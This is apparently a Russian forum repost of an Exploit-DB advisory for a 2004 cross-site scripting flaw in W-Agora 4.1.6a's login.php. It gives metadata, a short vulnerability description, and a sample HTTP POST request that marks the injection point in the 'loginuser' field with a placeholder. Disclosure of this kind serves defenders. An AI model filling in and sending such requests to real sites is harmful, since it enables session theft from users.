- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 24652
- Проверка EDB
-
- Пройдено
- Автор
- ALEXANDER ANTIPOV
- Тип уязвимости
- WEBAPPS
- Платформа
- PHP
- CVE
- cve-2004-1563
- Дата публикации
- 2004-09-30
W-Agora 4.1.6a - 'login.php?loginuser' Cross-Site Scripting
Код:
source: https://www.securityfocus.com/bid/11283/info
Multiple vulnerabilities are reported to affect the application. These issues arise due to insufficient sanitization of user-supplied data. A remote attacker may leverage these vulnerabilities to carry out SQL injection, cross-site scripting, and HTTP response splitting attacks.
These issues were identified in W-Agora 4.1.6a, however, it is possible that other versions are also affected.
POST /login.php HTTP/1.1
Host: w-agora
Content-Type: application/x-www-form-urlencoded
Content-Length: 89
loginform=1&redirect_url=1&loginuser=[XSS code here]&loginpassword=1- Источник
- www.exploit-db.com
